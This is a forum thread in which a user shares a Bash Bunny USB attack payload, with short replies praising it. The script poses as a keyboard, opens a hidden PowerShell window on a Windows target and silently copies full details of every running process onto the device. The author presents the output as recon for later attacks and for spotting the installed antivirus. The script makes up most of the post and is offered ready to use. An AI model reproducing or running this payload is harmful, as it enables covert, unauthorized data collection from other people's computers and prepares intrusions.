Decoy Posted April 1, 2017 Share Posted April 1, 2017 (edited) This is just a quick and dirty payload to return all running processes under the current user. This will return the path/filename/version, and quite a bit of other info as well. This information can be useful for planning future attacks, such as taking advantage of buffer overflows, and other various vulnerabilities to gain a more permanent foothold into a target system. It can also be useful in identifying what AV is in use on a target system. An example of useful process info: Name : avpui Id : 724 PriorityClass : Normal FileVersion : 17.0.0.643 Path : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe Company : AO Kaspersky Lab CPU : 85.875 ProductVersion : 17.0.0.643 Description : Kaspersky Anti-Virus Product : Kaspersky Anti-Virus https://github.com/DeeKoy/bashbunny-payloads/tree/master/payloads/library/ProcessInfo #!/bin/bash # # Title: Process Info # Author: Decoy # Version: 1.0 # Category: Recon # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, Storage # # # Amber Blink Fast.....Initialization # Amber................Begin # White Blinking... ...Moving loot to mass storage # Blue Blinking........Syncing File System # Green................Finished # Initialization LED R G 100 # Create loot directory mkdir -p /root/udisk/loot/ProcessInfo # Runs minimized powershell gathering process information for potential future attack vectors LED R G ATTACKMODE HID STORAGE QUACK DELAY 6000 QUACK GUI r QUACK STRING "powershell -NoP -NonI -W Hidden" QUACK ENTER QUCK DELAY 1000 QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit" QUACK ENTER LED R G B 100 sleep 1 # Sync File System LED B 100 sync; sleep 1; sync # Trap is clean LED G Edited April 1, 2017 by Decoy Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted April 1, 2017 Share Posted April 1, 2017 Simple but effective. Utilising simple powershell commands and functions is definitely one of the best things about Ducky script... 1 Quote Link to comment Share on other sites More sharing options...
Decoy Posted April 1, 2017 Author Share Posted April 1, 2017 6 hours ago, Dave-ee Jones said: Simple but effective. Utilising simple powershell commands and functions is definitely one of the best things about Ducky script... Yeah, I really didn't start playing around with or learning PowerShell until I got my Rubber Ducky. Easy to learn, and extremely effective. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted April 3, 2017 Share Posted April 3, 2017 On 4/2/2017 at 0:45 AM, Decoy said: Yeah, I really didn't start playing around with or learning PowerShell until I got my Rubber Ducky. Easy to learn, and extremely effective. Me too, except with my BB. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.